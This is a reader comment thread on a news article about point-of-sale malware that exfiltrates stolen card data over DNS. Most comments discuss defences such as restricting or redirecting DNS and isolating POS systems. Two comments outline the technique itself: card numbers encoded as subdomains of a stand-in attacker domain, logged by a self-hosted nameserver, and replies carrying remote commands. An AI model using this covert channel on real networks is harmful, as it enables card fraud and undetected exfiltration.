back to article VXers pass stolen card data over DNS

The NewPosThings malware has spawned an offspring that exploits the DNS protocol to sneak data past firewalls. The VXers have reasoned DNS has a couple of advantages for data exfiltration. Since the enterprise network can't talk to the Internet without it, it's unlikely to be blocked; and since it's probably thought of as more …

  1. Number6

    I assume the quick fix to that is to run your own local DNS server(s) and block DNS at the firewall for any local IP/MAC address except that of the server. That forces everyone on your network to use your local DNS rather than use Google or OpenDNS. An exploit that was good enough to be able to spoof the DNS IP/MAC might still get around it. It also assumes that the local DNS won't forward incomprehensible packets on the basis that it wouldn't know where to send them.

  2. chris 17 Bronze badge

    the fix is just to permit DNS to known external DNS servers (Google, BT etc)

    the better fix is to just permit specific internal hosts (like the internal DNS system) access to external DNS, blocking all and sundry access.

    if your processing PCI/DSS no internal host should be allowed to connect to an external host without first passing through a proxy (no not just a web proxy), the initial connection must be to a trusted internal and that then must spawn a new connection to the external third party.

  3. Anonymous Coward
    Anonymous Coward

    Those fixes aren't enough

    How would limiting access to other DNS servers but permitting normal access from your internal DNS server prevent this sort of thing?

    If I were wanting to pass card details over DNS, I'd query something like:

    56.10.59.10.81.01.82.50.myevil.site (obviously with a valid TLD).

    Hosting my own authoritative server for myevil.site and enabling logging (effectively) is all that is needed.

    That could be extended simply enough to include card validity and CVV number etc.

    This is an old trick. Someone even built an HTTP proxy around this idea (to get free service on walled-garden hotspots)

    1. Paul Crawford Silver badge

      Re: Those fixes aren't enough

      Very good point.

      However, would all sorts of requests to some odd domain not trip any decent intrusion detection system? Or am I being naive about how good such "enterprise" tools actually are in practice?

  4. AustinTX

    What you want to do is transparently redirect all traffic on the DNS port to your internal DNS server. This way, you benefit from security alerts when those seemingly-corrupt packets from infected machines are logged. DNS (and SMTP) redirection is standard for captive portals (public wifi hotspots). If you don't capture the DNS, then a bit of software on your portable can tunnel everything over 53 TCP and you get free wifi.

  5. jon909

    Hackers only need to look up an A record to a (sub)domain they control. The victim's IP and credit card(s) can be encrypted and encoded into an ASCII DNS name eg ip.creditcard.comprimised.dyndns.org

    The lookup might fail but the hackers' DNS server would have a log of the lookup or they could just reply with whatever data they want ie an IP thats really a fragment of remote command data.

    Therefore remote command requests and replies wouldn't even need to rely on TXT records and any usual proxying and UDP/TCP filtering of port 53 would not help.

    I guess the thing to look out for is to be suspicious of A records that aren't the root or www AND to clamp down on excessive lookups on the same domain.

    Practical solution? Get payment service providers to host "secure DNS".

  6. Pseudonymous Diehard

    Wouldnt

    The practical solution to this be putting POS systems on an isolated network of their own with no net access?

    1. Alister Silver badge

      Re: Wouldnt

      Wouldn't the practical solution to this be putting POS systems on an isolated network of their own with no net access?

      Don't POS systems require net access to carry out card verification etc?

      1. Anonymous Coward
        Anonymous Coward

        Re: Wouldnt

        But this issue is not limited to POS evilness - the principle can be used anywhere...

      2. Anonymous Coward
        Anonymous Coward

        Re: Wouldnt

        Yes, but as said you block dns out, allow connections to servers and ports needed, block everything else, have your own dns server, but disable recursion, and manually add any entries to your internal dns to all domains you need.

  7. Walter Bishop Silver badge
    Joke

    A new variant of a POS malware

    When will people stop using this defective Android malware vector on the Intertubes.

  8. knightred

    what a cool problem.

    The way I see the problem as pointed out already, everybody uses a card to buy things, and a shop must check if the card will give them money before selling things. So without instant credit check a shop would be frauded out of business and with a queued delay nobody would shop there. <blah blah> therefore you can't explicitly stop DNS... but it seems a POS device should probably really only ever need to lookup one domain. I can see why that's slightly less than desirable, but does it really need to lookup xyz.com, no all it needs is primarycardprocessor.com and possibly secondarycardprocessor.com.

    I have lost my train. I think the solution is to use some form of payment that would be transferable from person to person without relying on the Internet. Perhaps there could be different types that would represent different values? I don't know we'd have to think about it.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2019